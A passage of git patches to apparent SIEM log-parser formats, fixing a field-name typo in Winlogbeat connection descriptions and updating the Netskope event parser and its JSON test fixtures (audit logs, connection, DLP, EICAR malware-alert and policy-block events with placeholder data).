"{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, { "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", "relationships": [ @@ -1085,6 +1175,18 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" } ] }, From 2207f3078290450fbbbcfe9b4584bf68d7a3fb49 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:47:15 +0100 Subject: [PATCH 059/150] fixing typo --- Beats/winlogbeat/_meta/smart-descriptions.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index d3979925e..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1133,7 +1133,7 @@ ] }, { - "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", @@ -1159,7 +1159,7 @@ ] }, { - "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", From 6abd31bb9209f77aab598e290a7c8370a98a67ff Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 10:55:07 +0100 Subject: [PATCH 060/150] Fixes on Netskope format --- Netskope/netskope_events/ingest/parser.yml | 5 +- .../test_audit_log_deleted_inline_policy.json | 1 + .../test_audit_log_edit_admin_record.json | 1 + .../tests/test_audit_log_login_failed.json | 1 + .../test_audit_log_login_successful.json | 1 + .../test_audit_log_logout_successful.json | 1 + ..._audit_log_password_change_successful.json | 1 + .../tests/test_connection_log.json | 1 + .../tests/test_dlp_incident.json | 3 +- .../tests/test_malware_alert.json | 5 +- .../tests/test_nspolicy_block.json | 109 ++++++++++++++++ .../tests/test_nspolicy_log.json | 3 +- .../tests/test_nspolicy_upload.json | 120 ++++++++++++++++++ .../tests/test_user_alert.json | 2 +- 14 files changed, 248 insertions(+), 6 deletions(-) create mode 100644 Netskope/netskope_events/tests/test_nspolicy_block.json create mode 100644 Netskope/netskope_events/tests/test_nspolicy_upload.json diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..7ce3a2543 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,7 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.activity}}" + event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" @@ -92,6 +92,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..df70ea26e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..10b406a5f 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..8a792a408 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..01549d366 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..12e39be95 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..a2fa885de 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "iam" ], diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..5c5218356 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"_id\": \"69573873d4de0a4f1d2cbac4\",\n \"access_method\": \"Client\",\n \"app\": \"Swile\",\n \"appcategory\": \"HR\",\n \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n \"bypass_traffic\": \"yes\",\n \"category\": \"HR\",\n \"cci\": 16,\n \"ccl\": \"poor\",\n \"connection_id\": 0,\n \"count\": 1,\n \"domain\": \"test.example.org\",\n \"dst_country\": \"FR\",\n \"dst_geoip_src\": 1,\n \"dst_latitude\": 48.85836410522461,\n \"dst_location\": \"Paris\",\n \"dst_longitude\": 2.294532060623169,\n \"dst_region\": \"Ile-de-France\",\n \"dst_timezone\": \"Europe/Paris\",\n \"dst_zipcode\": \"N/A\",\n \"dstip\": \"5.6.7.8\",\n \"dstport\": 443,\n \"netskope_pop\": \"FR-PAR1\",\n \"organization_unit\": \"\",\n \"other_categories\": [\n \"Finance/Accounting\",\n \"All Categories\",\n \"HR\"\n ],\n \"page\": \"test.example.org\",\n \"policy\": \"bypass_ssl for regulation purpose\",\n \"request_id\": 1111111111111111111,\n \"site\": \"Swile\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.5.6.7\",\n \"ssl_decrypt_policy\": \"yes\",\n \"timestamp\": 1671639140,\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 0,\n \"type\": \"connection\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"test.example.org\",\n \"user\": \"john.doe@example.org\",\n \"user_generated\": \"yes\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"org\": \"\",\n \"http_transaction_count\": 0,\n \"network\": \"\",\n \"useragent\": \"\",\n \"dsthost\": \"\",\n \"numbytes\": 0,\n \"CononicalName\": \"\",\n \"os_version\": \"\",\n \"browser_session_id\": 0,\n \"resp_cnt\": 0,\n \"log_file_name\": \"\",\n \"suppression_end_time\": 0,\n \"browser_version\": \"\",\n \"severity\": \"\",\n \"client_bytes\": 0,\n \"suppression_start_time\": 0,\n \"app_session_id\": 0,\n \"sAMAccountName\": \"\",\n \"req_cnt\": 0,\n \"device\": \"\",\n \"browser\": \"\",\n \"userPrincipalName\": \"\",\n \"conn_endtime\": 1671639139,\n \"conn_duration\": 3,\n \"protocol\": \"\",\n \"fromlogs\": \"\",\n \"serial\": \"\",\n \"resp_content_len\": 0,\n \"dynamic_classification\": \"\",\n \"hostname\": \"\",\n \"os\": \"\",\n \"server_bytes\": 0,\n \"conn_starttime\": 1671639136,\n \"sessionid\": \"\",\n \"resp_content_type\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "network" ], diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..37ab6e32b 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -30,7 +30,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..5e5f6de15 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"Detection\",\n \"activity\": \"Download\",\n \"alert\": \"yes\",\n \"alert_type\": \"Malware\",\n \"app\": \"eicar\",\n \"app_session_id\": 111111111111111111,\n \"appcategory\": \"n/a\",\n \"browser\": \"Safari\",\n \"category\": \"n/a\",\n \"cci\": \"\",\n \"ccl\": \"unknown\",\n \"connection_id\": 0,\n \"count\": 1,\n \"device\": \"Mac Device\",\n \"dst_country\": \"US\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 47.6711,\n \"dst_location\": \"Redmond\",\n \"dst_longitude\": -122.1253,\n \"dst_region\": \"Washington\",\n \"dst_timezone\": \"America/Los_Angeles\",\n \"dst_zipcode\": \"98073\",\n \"dstip\": \"5.6.7.8\",\n \"file_path\": \"NA\",\n \"file_size\": 308,\n \"file_type\": \"File Type Not Detected\",\n \"hostname\": \"MacBook Pro\",\n \"instance\": null,\n \"managementID\": \"99999999999999999999999999999999\",\n \"md5\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"mime_type\": \"\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"eicarcom2.zip\",\n \"object_id\": \"68b329da9893e34099c7d8ad5cb9c940\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Monterey\",\n \"referer\": \"https://www.eicar.org/\",\n \"request_id\": 2222222222222222222,\n \"severity\": \"high\",\n \"site\": \"eicar\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"timestamp\": 1671631928,\n \"title\": \"eicarcom2.zip\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 3333333333333333333,\n \"tss_mode\": \"inline\",\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"secure.eicar.org/eicarcom2.zip\",\n \"user\": \"john.doe@example.org\",\n \"user_id\": \"john.doe@example.org\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"browser_version\": \"\",\n \"owner\": \"\",\n \"dlp_incident_id\": 0,\n \"channel_id\": \"\",\n \"from_user_category\": \"\",\n \"resp_cnt\": 0,\n \"suppression_key\": \"\",\n \"loginurl\": \"\",\n \"total_collaborator_count\": 0,\n \"os_version\": \"\",\n \"dlp_rule\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"instance_id\": \"\",\n \"to_user\": \"\",\n \"suppression_end_time\": 0,\n \"fromlogs\": \"\",\n \"dlp_parent_id\": 0,\n \"dstport\": 0,\n \"dst_timezone\": \"\",\n \"serial\": \"\",\n \"audit_category\": \"\",\n \"sha256\": \"\",\n \"from_user\": \"\",\n \"sAMAccountName\": \"\",\n \"app_activity\": \"\",\n \"useragent\": \"\",\n \"netskope_activity\": \"\",\n \"conn_duration\": 0,\n \"other_categories\": [],\n \"custom_connector\": \"\",\n \"dlp_rule_severity\": \"\",\n \"numbytes\": 0,\n \"telemetry_app\": \"\",\n \"true_obj_category\": \"\",\n \"userPrincipalName\": \"\",\n \"logintype\": \"\",\n \"suppression_start_time\": 0,\n \"browser_session_id\": 0,\n \"dlp_profile\": \"\",\n \"src_time\": \"\",\n \"modified\": 0,\n \"policy\": \"\",\n \"policy_id\": \"\",\n \"notify_template\": \"\",\n \"audit_type\": \"\",\n \"orignal_file_path\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"org\": \"\",\n \"user_category\": \"\",\n \"dlp_unique_count\": 0,\n \"exposure\": \"\",\n \"netskope_pop\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"sanctioned_instance\": \"\",\n \"device_classification\": \"\",\n \"data_type\": \"\",\n \"scan_type\": \"\",\n \"internal_collaborator_count\": 0,\n \"CononicalName\": \"\",\n \"workspace\": \"\",\n \"log_file_name\": \"\",\n \"parent_id\": \"\",\n \"true_obj_type\": \"\",\n \"dlp_rule_count\": 0,\n \"sessionid\": \"\",\n \"workspace_id\": \"\",\n \"page_site\": \"\",\n \"universal_connector\": \"\",\n \"server_bytes\": 0,\n \"req_cnt\": 0,\n \"file_lang\": \"\",\n \"protocol\": \"\",\n \"web_universal_connector\": \"\",\n \"dsthost\": \"\",\n \"appsuite\": \"\",\n \"managed_app\": \"\",\n \"page\": \"\"\n}\n", "event": { - "action": "Download", + "action": "Detection", "category": [ "malware" ], @@ -36,7 +36,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..0d739d4fd --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json @@ -0,0 +1,109 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "block", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + "postal_code": "75018", + "region_name": 